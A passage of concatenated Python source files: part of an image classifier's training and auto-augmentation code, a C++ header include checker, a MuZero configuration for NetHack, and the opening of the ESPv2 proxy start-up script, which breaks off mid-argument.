train_score, valid_score)
self.use_test_time_augmentation = self.info['loop']['test'] > 1
# Adapt Apply Fast auto aug
if self.hyper_params['conditions']['use_fast_auto_aug'] and \
(train_score > 0.995 or self.info['terminate']) and \
remaining_time_budget > 120 and \
self.dataloaders['valid'] is not None and \
not hasattr(self, 'update_transforms'):
LOGGER.info('[adapt] search fast auto aug policy')
self.update_transforms = True
self.info['terminate'] = True
# reset optimizer pararms
self.init_opt()
self.hyper_params['conditions']['max_inner_loop_ratio'] *= 3
self.hyper_params['conditions']['threshold_valid_score_diff'] = 0.00001
self.hyper_params['conditions']['min_lr'] = 1e-8
original_valid_policy = self.dataloaders['valid'].dataset.transform.transforms
original_train_policy = self.dataloaders['train'].dataset.transform.transforms
policy = skeleton.data.augmentations.autoaug_policy()
num_policy_search = 100
num_sub_policy = 3
num_select_policy = 3
searched_policy = []
for policy_search in range(num_policy_search):
selected_idx = np.random.choice(list(range(len(policy))), num_sub_policy)
selected_policy = [policy[i] for i in selected_idx]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
selected_policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device).half()
]
metrics = []
for policy_eval in range(num_sub_policy):
valid_dataloader = self.build_or_get_dataloader('valid', self.datasets['valid'], self.datasets['num_valids'])
# original_valid_batch_size = valid_dataloader.batch_sampler.batch_size
# valid_dataloader.batch_sampler.batch_size = batch_size
valid_metrics = self.epoch_valid(self.info['loop']['epoch'], valid_dataloader, reduction='max')
# valid_dataloader.batch_sampler.batch_size = original_valid_batch_size
metrics.append(valid_metrics)
loss = np.max([m['loss'] for m in metrics])
score = np.max([m['score'] for m in metrics])
LOGGER.info('[adapt] [FAA] [%02d/%02d] score: %f, loss: %f, selected_policy: %s',
policy_search, num_policy_search, score, loss, selected_policy)
searched_policy.append({
'loss': loss,
'score': score,
'policy': selected_policy
})
flatten = lambda l: [item for sublist in l for item in sublist]
policy_sorted_index = np.argsort([p['score'] for p in searched_policy])[::-1][:num_select_policy]
policy = flatten([searched_policy[idx]['policy'] for idx in policy_sorted_index])
policy = skeleton.data.augmentations.remove_duplicates(policy)
LOGGER.info('[adapt] [FAA] scores: %s',
[searched_policy[idx]['score'] for idx in policy_sorted_index])
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy
self.dataloaders['train'].dataset.transform.transforms = original_train_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device).half()
]
def activation(self, logits):
if self.is_multiclass():
logits = torch.sigmoid(logits)
prediction = (logits > 0.5).to(logits.dtype)
else:
logits = torch.softmax(logits, dim=-1)
_, k = logits.max(-1)
prediction = torch.zeros(logits.shape, dtype=logits.dtype, device=logits.device).scatter_(-1, k.view(-1, 1), 1.0)
return logits, prediction
def get_model_state(self):
return self.model.state_dict()
def epoch_train(self, epoch, train, model=None, optimizer=None):
model = model if model is not None else self.model
optimizer = optimizer if optimizer is not None else self.optimizer
model.train()
num_steps = len(train)
metrics = []
for step, (examples, labels) in enumerate(train):
if examples.shape[0] == 1:
examples = examples[0]
labels = labels[0]
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
# batch_size = examples.size(0)
# examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
# labels = torch.cat([labels, labels], dim=0)
skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = model(examples, labels, tau=self.tau)
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
# logits1, logits2 = torch.split(logits, batch_size, dim=0)
# logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits.float())
tpr, tnr, nbac = NBAC(prediction, original_labels.float())
auc = AUC(logits, original_labels.float())
score = auc if self.hyper_params['conditions']['score_type'] == 'auc' else float(nbac.detach().float())
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
LOGGER.debug(
'[train] [%02d] [%03d/%03d] loss:%.6f AUC:%.3f NBAC:%.3f tpr:%.3f tnr:%.3f, lr:%.8f',
epoch, step, num_steps, loss, auc, nbac, tpr, tnr,
optimizer.get_learning_rate()
)
train_loss = np.average([m['loss'] for m in metrics])
train_score = np.average([m['score'] for m in metrics])
optimizer.update(train_loss=train_loss)
return {
'loss': train_loss,
'score': train_score,
}
def epoch_valid(self, epoch, valid, reduction='avg'):
self.model.eval()
num_steps = len(valid)
metrics = []
tau = self.tau
for step, (examples, labels) in enumerate(valid):
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = self.model(examples, labels, tau=tau, reduction=reduction)
logits, prediction = self.activation(logits.float())
tpr, tnr, nbac = NBAC(prediction, original_labels.float())
auc = AUC(logits, original_labels.float())
score = auc if self.hyper_params['conditions']['score_type'] == 'auc' else float(nbac.detach().float())
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
LOGGER.debug(
'[valid] [%02d] [%03d/%03d] loss:%.6f AUC:%.3f NBAC:%.3f tpr:%.3f tnr:%.3f, lr:%.8f',
epoch, step, num_steps, loss, auc, nbac, tpr, tnr,
self.optimizer.get_learning_rate()
)
if reduction == 'avg':
valid_loss = np.average([m['loss'] for m in metrics])
valid_score = np.average([m['score'] for m in metrics])
elif reduction == 'max':
valid_loss = np.max([m['loss'] for m in metrics])
valid_score = np.max([m['score'] for m in metrics])
elif reduction == 'min':
valid_loss = np.min([m['loss'] for m in metrics])
valid_score = np.min([m['score'] for m in metrics])
else:
raise Exception('not support reduction method: %s' % reduction)
self.optimizer.update(valid_loss=np.average(valid_loss))
return {
'loss': valid_loss,
'score': valid_score,
}
def skip_valid(self, epoch):
LOGGER.debug('[valid] skip')
return {
'loss': 99.9,
'score': epoch * 1e-4,
}
def prediction(self, dataloader):
self.model_pred.eval()
epoch = self.info['loop']['epoch']
best_idx = np.argmax(np.array([c['valid']['score'] for c in self.checkpoints]))
best_loss = self.checkpoints[best_idx]['valid']['loss']
best_score = self.checkpoints[best_idx]['valid']['score']
tau = self.tau
states = self.checkpoints[best_idx]['model']
self.model_pred.load_state_dict(states)
LOGGER.info('best checkpoints at %d/%d (valid loss:%f score:%f) tau:%f',
best_idx + 1, len(self.checkpoints), best_loss, best_score, tau)
predictions = []
self.model_pred.eval()
for step, (examples, labels) in enumerate(dataloader):
# examples = examples[0]
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
batch_size = examples.size(0)
# Test-Time Augment flip
if self.use_test_time_augmentation:
examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits = self.model_pred(examples, tau=tau)
# avergae
if self.use_test_time_augmentation:
logits1, logits2 = torch.split(logits, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits)
predictions.append(logits.detach().float().cpu().numpy())
predictions = np.concatenate(predictions, axis=0).astype(np.float)
return predictions
|
cpp-header-checker.py
|
#!/usr/bin/env python
# Tool cpp-header-checker
#
# Copyright (C) 2022 Wang Qi (wqking)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import sys
import os
import glob
import argparse
import traceback
import threading
import queue
import tempfile
import random
import string
import time
import shutil
import codecs
import re
import pathlib
import shlex
def getRandomString(length) :
return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
def writeFile(fileName, content) :
with codecs.open(fileName, "w", "utf-8") as file :
file.write(str(content))
def readFile(fileName) :
with codecs.open(fileName, "r", "utf-8") as file :
return file.read()
def removeNthInclude(content, n) :
success = False
include = ''
def callback(m) :
nonlocal n, success, include
n -= 1
if n == -1 :
success = True
include = m.group(1)
return ''
else :
return m.group()
result = re.sub(r'(^\s*\#\s*include.*$)', callback, content, flags = re.M)
return result, success, include
def test_removeNthInclude() :
content = '''aaa
#include "abc.h"
bbb
#include <xyz/def.h>
ccc
'''
print(removeNthInclude(content, 0))
print(removeNthInclude(content, 1))
print(removeNthInclude(content, 2))
def isWindows() :
return sys.platform.startswith('win')
def normalizeCommand(command) :
return shlex.split(command, posix = not isWindows())
class TaskProcessor :
def __init__(self, app) :
self._app = app
self._tempPath = None
def initialize(self) :
self._tempPath = os.path.join(self._app.getTempPath(), self.getRandomFileName())
os.mkdir(self._tempPath)
def finalize(self) :
shutil.rmtree(self._tempPath)
def getApp(self) :
return self._app
def makeTempFileName(self, fileName) :
return os.path.join(self._tempPath, fileName)
def makeCommand(self, sourceFile) :
command = self._app.getCommand()
command = command.replace('{file}', sourceFile)
return command
def makeMainSourceCode(self, header) :
code = ''
code += '#include "%s"\n' % (header)
return code
def getRandomFileName(self, ext = None) :
fileName = '%s_%s_%s' % (
getRandomString(12),
str(threading.get_ident()),
str(int(time.time()))
)
if ext is not None :
fileName += ext
return fileName
def process(self, headerFile) :
header = os.path.abspath(headerFile)
self.doProcess(header)
def doProcess(self) :
pass
class CompleteHeaderProcessor(TaskProcessor) :
def __init__(self, app):
super().__init__(app)
def doProcess(self, header) :
mainFileName = self.getRandomFileName('.cpp')
fullMainFileName = self.makeTempFileName(mainFileName)
command = self.makeCommand(fullMainFileName)
writeFile(fullMainFileName, self.makeMainSourceCode(header))
result = subprocess.run(normalizeCommand(command), stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)
if result.returncode == 0 :
self.getApp().log('%s - OK' % (header))
else :
self.getApp().log('%s - ERROR\n%s' % (header, result.stdout))
self.getApp().error()
class RedundantHeaderProcessor(TaskProcessor) :
def __init__(self, app):
super().__init__(app)
def doProcess(self, header) :
headerContent = readFile(header)
includeIndexToRemove = 0
redundantIncludeList = []
while not self.getApp().shouldStop() :
content, success, include = removeNthInclude(headerContent, includeIndexToRemove)
if not success :
break
includeIndexToRemove += 1
newHeaderName = self.getRandomFileName('.h')
newFullHeaderName = os.path.join(str(pathlib.Path(header).parent.resolve()), newHeaderName)
writeFile(newFullHeaderName, content)
try :
mainFileName = self.getRandomFileName('.cpp')
fullMainFileName = self.makeTempFileName(mainFileName)
command = self.makeCommand(fullMainFileName)
writeFile(fullMainFileName, self.makeMainSourceCode(newFullHeaderName))
result = subprocess.run(normalizeCommand(command), stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)
if result.returncode == 0 :
include = include.replace('#include', '')
include = re.sub(r'[\"\'\<\>]', '', include)
include = include.strip()
redundantIncludeList.append(include)
finally:
os.unlink(newFullHeaderName)
if len(redundantIncludeList) == 0 :
self.getApp().log('%s - OK' % (header))
else :
# Display log after all #includes are checked, this ease for looking at the errors
self.getApp().log('%s - ERROR redundant: %s' % (header, ', '.join(redundantIncludeList)))
self.getApp().error()
class Application :
def __init__(self) :
self._sourcePatternList = []
self._excludePatterns = []
self._command = 'gcc {file} -c -o {file}.o'
self._tempPath = None
self._threads = None
self._stopOnError = 'yes'
self._queue = queue.Queue()
self._lock = threading.Lock()
self._processor = None
self._stopping = False
def getCommand(self) :
return self._command
def getTempPath(self) :
return self._tempPath
def log(self, message) :
with self._lock :
print(message)
def error(self) :
if self._stopOnError == 'yes' :
self._stopping = True
def shouldStop(self) :
return self._stopping
def run(self) :
if not self._parseCommandLine(sys.argv[1:]) :
return
self._processor.initialize()
try :
self._doRun()
except Exception as e:
traceback.print_exc()
finally :
self._processor.finalize()
def _doRun(self) :
for pattern in self._sourcePatternList :
fileList = glob.glob(pattern, recursive = True)
for file in fileList :
if self._canProcessFile(file) :
self._queue.put(file)
threadList = []
for i in range(self._threads) :
thread = threading.Thread(target = lambda : self._executeThread())
threadList.append(thread)
thread.start()
for thread in threadList :
thread.join()
def _executeThread(self) :
while not self.shouldStop() :
try :
task = self._queue.get(block = False)
except :
task = None
if task is None :
break
self._doTask(task)
self._queue.task_done()
def _doTask(self, task) :
self._processor.process(task)
def _canProcessFile(self, file) :
for exclude in self._excludePatterns :
if exclude in file :
return False
return True
def _parseCommandLine(self, commandLineArguments) :
parser = argparse.ArgumentParser(add_help = False)
parser.add_argument('--help', action = 'store_true', help = 'Show help message')
parser.add_argument('-h', action = 'store_true', dest = 'help', help = 'Show help message')
parser.add_argument('--source', action = 'append', required = True, help = "The source file patterns, can have path and wildcard")
parser.add_argument(
'action',
nargs='?',
help = "The action, can be complete or redundant",
default = 'complete',
choices = [ 'complete', 'redundant' ]
)
parser.add_argument('--command', required = False, help = "The command to compile the sample cpp source file", default = self._command)
parser.add_argument('--temp', required = False, help = "Temporary directory. Default is the system temporary folder", default = None)
parser.add_argument('--exclude', action = 'append', required = False, help = "The patterns to exclude, can not have wildcard")
parser.add_argument('--threads', required = False, type = int, help = "Number of threads", default = None)
parser.add_argument(
'--stop-on-error',
required = False,
help = "Whether stop on first error, choices are auto/yes/no. 'auto' stops for action 'complete', not for 'redundant'",
default = 'auto',
choices = [ 'auto', 'yes', 'no' ]
)
if len(commandLineArguments) == 0 :
self._showUsage(parser)
return False
try :
options = parser.parse_args(commandLineArguments)
options = vars(options)
except :
self._showUsage(parser)
return False
if options['help'] :
self._showUsage(parser)
return False
self._sourcePatternList = options['source']
self._command = options['command']
self._tempPath = options['temp']
if self._tempPath is None :
self._tempPath = tempfile.gettempdir()
self._tempPath = os.path.join(self._tempPath, '') # append /
self._excludePatterns = options['exclude']
if self._excludePatterns is None :
self._excludePatterns = []
self._threads = options['threads']
if self._threads is None :
self._threads = os.cpu_count()
if self._threads is None or self._threads < 1 :
self._threads = 1
self._stopOnError = options['stop_on_error'].lower()
action = options['action']
if action == 'redundant' :
self._processor = RedundantHeaderProcessor(self)
if self._stopOnError == 'auto' :
self._stopOnError = 'no'
else :
self._processor = CompleteHeaderProcessor(self)
if self._stopOnError == 'auto' :
self._stopOnError = 'yes'
return True
def _showUsage(self, parser) :
parser.print_help()
Application().run()
|
nethack.py
|
import ctypes
import datetime
import os
import multiprocessing
import traceback
import gym
from .abstract_game import AbstractGame
from autoascend.env_wrapper import EnvWrapper
class MuZeroConfig:
def __init__(self, rl_model=None):
# More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization
self.seed = 0 # Seed for numpy, torch and the game
self.max_num_gpus = None # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use every GPUs available
### Game
if rl_model is None:
game = Game()
game._kill_thread()
rl_model = game.rl_model
del game
if 'HACKDIR' in os.environ:
del os.environ['HACKDIR'] # nle leave some trashes that need to be cleaned up
self.observation_shape = rl_model.observation_shape() # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)
self.action_space = list(range(len(rl_model.action_space))) # Fixed list of all possible actions. You should only edit the length
#self.observation_shape = (98, 1, 1)
#self.action_space = list(range(9))
self.players = list(range(1)) # List of players. You should only edit the length
self.stacked_observations = 0 # Number of previous observations and previous actions to add to the current observation
# Evaluate
self.muzero_player = 0 # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)
self.opponent = None # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, "random" or "expert" if implemented in the Game class
### Self-Play
self.num_workers = 40 # Number of simultaneous threads/workers self-playing to feed the replay buffer
self.selfplay_on_gpu = False
self.max_moves = 1e6 # Maximum number of moves if game is not finished before
self.num_simulations = 5 # Number of future moves self-simulated
self.discount = 0.997 # Chronological discount of the reward
self.temperature_threshold = None # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time
# Root prior exploration noise
self.root_dirichlet_alpha = 0.25
self.root_exploration_fraction = 0.25
# UCB formula
self.pb_c_base = 19652
self.pb_c_init = 1.25
### Network
self.network = "resnet" # "resnet" / "fullyconnected"
self.support_size = 300 # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))
# Residual Network
self.downsample = None # Downsample observations before representation network, False / "CNN" (lighter) / "resnet" (See paper appendix Network Architecture)
self.blocks = 8 # Number of blocks in the ResNet
self.channels = 128 # Number of channels in the ResNet
self.reduced_channels_reward = 256 # Number of channels in reward head
self.reduced_channels_value = 256 # Number of channels in value head
self.reduced_channels_policy = 256 # Number of channels in policy head
self.resnet_fc_reward_layers = [256, 256] # Define the hidden layers in the reward head of the dynamic network
self.resnet_fc_value_layers = [256, 256] # Define the hidden layers in the value head of the prediction network
self.resnet_fc_policy_layers = [256, 256] # Define the hidden layers in the policy head of the prediction network
# Fully Connected Network
self.encoding_size = 10
self.fc_representation_layers = [] # Define the hidden layers in the representation network
self.fc_dynamics_layers = [16] # Define the hidden layers in the dynamics network
self.fc_reward_layers = [16] # Define the hidden layers in the reward network
self.fc_value_layers = [] # Define the hidden layers in the value network
self.fc_policy_layers = [] # Define the hidden layers in the policy network
### Training
self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "/checkpoints", os.path.basename(__file__)[:-3], datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")) # Path to store the model weights and TensorBoard logs
self.save_model = True # Save the checkpoint in results_path as model.checkpoint
self.training_steps = int(1000e3) # Total number of training steps (ie weights update according to a batch)
self.batch_size = 128 # Number of parts of games to train on at each training step
self.checkpoint_interval = int(1e3) # Number of training steps before using the model for self-playing
self.value_loss_weight = 0.25 # Scale the value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)
self.train_on_gpu = True #torch.cuda.is_available() # Train on GPU if available
self.optimizer = "Adam" # "Adam" or "SGD". Paper uses SGD
self.weight_decay = 1e-4 # L2 weights regularization
self.momentum = 0.9 # Used only if optimizer is SGD
# Exponential learning rate schedule
self.lr_init = 0.001 # Initial learning rate
self.lr_decay_rate = 0.1 # Set it to 1 to use a constant learning rate
self.lr_decay_steps = 350e3
### Replay Buffer
self.replay_buffer_size = 1e6 # Number of self-play games to keep in the replay buffer
self.num_unroll_steps = 5 # Number of game moves to keep for every batch element
self.td_steps = 10 # Number of steps in the future to take into account for calculating the target value
self.PER = True # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network
self.PER_alpha = 1 # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1
# Reanalyze (See paper appendix Reanalyse)
self.use_last_model_value = True # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)
self.reanalyse_on_gpu = False
### Adjust the self play / training ratio to avoid over/underfitting
self.self_play_delay = 0 # Number of seconds to wait after each played game
self.training_delay = 0 # Number of seconds to wait after each training step
self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it
def visit_softmax_temperature_fn(self, trained_steps):
"""
Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.
The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.
Returns:
Positive float.
"""
if trained_steps < 500e3:
return 1.0
elif trained_steps < 750e3:
return 0.5
else:
return 0.25
class Game(AbstractGame):
"""
Game wrapper.
"""
def __init__(self, seed=None):
self.rl_model = None
self.last_score = 0
self._start_thread()
self.current_legal_actions = list(range(len(self.rl_model.action_space)))
@staticmethod
def _create_env(seed, output_queue, input_queue, env=None):
if env is None:
env = gym.make('NetHackChallenge-v0')
env = EnvWrapper(env,
agent_args=dict(rl_model_to_train='fight2',
rl_model_training_comm=(output_queue, input_queue)))
if seed is not None:
env.env.seed(seed, seed)
return env
def _start_thread(self):
output_queue, input_queue = multiprocessing.Queue(), multiprocessing.Queue()
self.output_queue = output_queue
self.input_queue = input_queue
def f():
try:
env = Game._create_env(None, output_queue, input_queue)
env.main()
except BaseException as e:
print(f'exception: {"".join(traceback.format_exception(None, e, e.__traceback__))}')
finally:
output_queue.put((None, None, None))
self.thread = multiprocessing.Process(target=f)
self.thread.start()
self.rl_model = self.output_queue.get()
def _kill_thread(self):
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(self.thread.ident,
ctypes.py_object(KeyboardInterrupt))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(self.thread.ident, 0)
raise RuntimeError('Exception raise failure')
self.thread.terminate()
self.thread.join()
def step(self, action):
"""
Apply action to the game.
Args:
action : action of the action_space to take.
Returns:
The new observation, the reward and a boolean if the game has ended.
"""
self.input_queue.put(action)
val = self.output_queue.get()
observation, self.current_legal_actions, score = val
if observation is None:
is_done = True
observation = self.rl_model.zero_observation()
score = self.last_score
else:
is_done = False
reward = score - self.last_score
self.last_score = score
return self.rl_model.encode_observation(observation), reward, is_done
def legal_actions(self):
"""
Should return the legal actions at each turn, if it is not available, it can return
the whole action space. At each turn, the game have to be able to handle one of returned actions.
For complex game where calculating legal moves is too long, the idea is to define the legal actions
equal to the action space but to return a negative reward if the action is illegal.
Returns:
An array of integers, subset of the action space.
"""
return self.current_legal_actions
def reset(self):
"""
Reset the game for a new game.
Returns:
Initial observation of the game.
"""
while 1:
self._kill_thread()
self.last_score = 0
self._start_thread()
val = self.output_queue.get()
observation, self.current_legal_actions, score = val
self.last_score = score
if observation is not None:
break
return self.rl_model.encode_observation(observation)
def close(self):
"""
Properly close the game.
"""
self._kill_thread()
def render(self):
"""
Display the game observation.
"""
self.env.render()
input("Press enter to take a step ")
|
start_proxy.py
|
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
# The command to generate Envoy bootstrap config
BOOTSTRAP_CMD = "bin/bootstrap"
# Location of Config Manager and Envoy binary
CONFIGMANAGER_BIN = "bin/configmanager"
ENVOY_BIN = "bin/envoy"
# Health check period in secs, for Config Manager and Envoy.
HEALTH_CHECK_PERIOD = 60
# bootstrap config file will write here.
# By default, envoy writes some logs to /tmp too
# If root file system is read-only, this folder should be
# mounted from tmpfs.
DEFAULT_CONFIG_DIR = "/tmp"
# bootstrap config file name.
BOOTSTRAP_CONFIG = "/bootstrap.json"
# Default Listener port
DEFAULT_LISTENER_PORT = 8080
# Default backend
DEFAULT_BACKEND = "http://127.0.0.1:8082"
# Default rollout_strategy
DEFAULT_ROLLOUT_STRATEGY = "fixed"
# Google default application credentials environment variable
GOOGLE_CREDS_KEY = "GOOGLE_APPLICATION_CREDENTIALS"
# Flag defaults when running on serverless.
SERVERLESS_PLATFORM = "Cloud Run(ESPv2)"
SERVERLESS_XFF_NUM_TRUSTED_HOPS = 0
def gen_bootstrap_conf(args):
cmd = [BOOTSTRAP_CMD, "--logtostderr"]
cmd.extend(["--admin_port", str(args.status_port)])
if args.http_request_timeout_s:
cmd.extend(
["--http_request_timeout_s",
str(args.http_request_timeout_s)])
bootstrap_file = DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG
cmd.append(bootstrap_file)
print(cmd)
return cmd
class ArgumentParser(argparse.ArgumentParser):
def error(self, message):
self.print_help(sys.stderr)
self.exit(1, '%s: error: %s\n' % (self.prog, message))
# Notes: These flags should get aligned with that of ESP at
# https://github.com/cloudendpoints/esp/blob/master/start_esp/start_esp.py#L420
def make_argparser():
parser = ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
ESPv2 start-up script. This script starts Config Manager and Envoy.
The service name and config ID are optional. If not supplied, the Config Manager
fetches the service name and the config ID from the metadata service as
attributes "service_name" and "service_config_id".
ESPv2 relies on the metadata service to fetch access tokens for Google
services. If you deploy ESPv2 outside of Google Cloud environment, you need
to provide a service account credentials file by setting "creds_key"
environment variable or by passing "-k" flag to this script.
''')
parser.add_argument(
'-s',
'--service',
default="",
help=''' Set the name of the Endpoints service. If omitted and -c not
specified, ESPv2 contacts the metadata service to fetch the service
name. ''')
parser.add_argument(
'-v',
'--version',
default="",
help=''' Set the service config ID of the Endpoints service.
If omitted and -c not specified, ESPv2 contacts the metadata
service to fetch the service config ID. ''')
parser.add_argument(
'--service_json_path',
default=None,
help='''
Specify a path for ESPv2 to load the endpoint service config.
With this flag, ESPv2 will use "fixed" rollout strategy and following
flags will be ignored:
--service, --version, and --rollout_strategy.
''')
parser.add_argument(
'-a',
'--backend',
default=DEFAULT_BACKEND,
help='''
Specify the local backend application server address
when using ESPv2 as a sidecar.
Default value is {backend}. Follow the same format when setting
manually. Valid schemes are `http`, `https`, `grpc`, and `grpcs`.
'''.format(backend=DEFAULT_BACKEND))
parser.add_argument('--listener_port', default=None, type=int, help='''
The port to accept downstream connections.
It supports HTTP/1.x, HTTP/2, and gRPC connections.
Default is {port}'''.format(port=DEFAULT_LISTENER_PORT))
parser.add_argument('-N', '--status_port', '--admin_port', default=0,
type=int, help=''' Enable ESPv2 Envoy admin on this port. Please refer
to https://www.envoyproxy.io/docs/envoy/latest/operations/admin.
By default the admin port is disabled.''')
parser.add_argument('--ssl_server_cert_path', default=None, help='''
Proxy's server cert path. When configured, ESPv2 only accepts HTTP/1.x and
HTTP/2 secure connections on listener_port. Requires the certificate and
key files "server.crt" and "server.key" within this path.''')
parser.add_argument('--ssl_backend_client_cert_path', default=None, help='''
Proxy's client cert path. When configured, ESPv2 enables TLS mutual
authentication for HTTPS backends. Requires the certificate and
key files "client.crt" and "client.key" within this path.''')
parser.add_argument('--ssl_backend_client_root_certs_file', default=None, help='''
The file path of root certificates that ESPv2 uses to verify backend server certificate.
If not specified, ESPv2 uses '/etc/ssl/certs/ca-certificates.crt' by default.''')
parser.add_argument('--ssl_minimum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Minimum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--ssl_maximum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Maximum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--enable_strict_transport_security', action='store_true',
help='''Enable HSTS (HTTP Strict Transport Security). "Strict-Transport-Security" response header
with value "max-age=31536000; includeSubdomains;" is added for all responses from local backend.
Not valid for remote backends.''')
parser.add_argument('--generate_self_signed_cert', action='store_true',
help='''Generate a self-signed certificate and key at start, then
store them in /tmp/ssl/endpoints/server.crt and /tmp/ssl/endponts/server.key.
This is useful when only a random self-sign cert is needed to serve
HTTPS requests. Generated certificate will have Common Name
"localhost" and valid for 10 years.
''')
parser.add_argument('-z', '--healthz', default=None, help='''Define a
health checking endpoint on the same ports as the application backend.
For example, "-z healthz" makes ESPv2 return code 200 for location
"/healthz", instead of forwarding the request to the backend. Please
don't use any paths conflicting with your normal requests.
Default: not used.''')
parser.add_argument(
'-R',
'--rollout_strategy',
default=DEFAULT_ROLLOUT_STRATEGY,
help='''The service config rollout strategy, [fixed|managed],
Default value: {strategy}'''.format(strategy=DEFAULT_ROLLOUT_STRATEGY),
choices=['fixed', 'managed'])
# Customize management service url prefix.
parser.add_argument(
'-g',
'--management',
default=None,
help=argparse.SUPPRESS)
# CORS presets
parser.add_argument(
'--cors_preset',
default=None,
help='''
Enables setting of CORS headers. This is useful when using a GRPC
backend, since a GRPC backend cannot set CORS headers.
Specify one of available presets to configure CORS response headers
in nginx. Defaults to no preset and therefore no CORS response
headers. If no preset is suitable for the use case, use the
--nginx_config arg to use a custom nginx config file.
Available presets:
- basic - Assumes all location paths have the same CORS policy.
Responds to preflight OPTIONS requests with an empty 204, and the
results of preflight are allowed to be cached for up to 20 days
(1728000 seconds). See descriptions for args --cors_allow_origin,
--cors_allow_methods, --cors_allow_headers, --cors_expose_headers,
--cors_allow_credentials for more granular configurations.
- cors_with_regex - Same as basic preset, except that specifying
allowed origins in regular expression. See descriptions for args
--cors_allow_origin_regex, --cors_allow_methods,
--cors_allow_headers, --cors_expose_headers, --cors_allow_credentials
for more granular configurations.
''')
parser.add_argument(
'--cors_allow_origin',
default='*',
help='''
Only works when --cors_preset is 'basic'. Configures the CORS header
Access-Control-Allow-Origin. Defaults to "*" which allows all origins.
''')
parser.add_argument(
'--cors_allow_origin_regex',
default='',
help='''
Only works when --cors_preset is 'cors_with_regex'. Configures the
whitelists of CORS header Access-Control-Allow-Origin with regular
expression.
''')
parser.add_argument(
'--cors_allow_methods',
default='GET, POST, PUT, PATCH, DELETE, OPTIONS',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Methods. Defaults to allow common HTTP
methods.
''')
parser.add_argument(
'--cors_allow_headers',
default=
'DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Headers. Defaults to allow common HTTP
headers.
''')
parser.add_argument(
'--cors_expose_headers',
default='Content-Length,Content-Range',
help='''
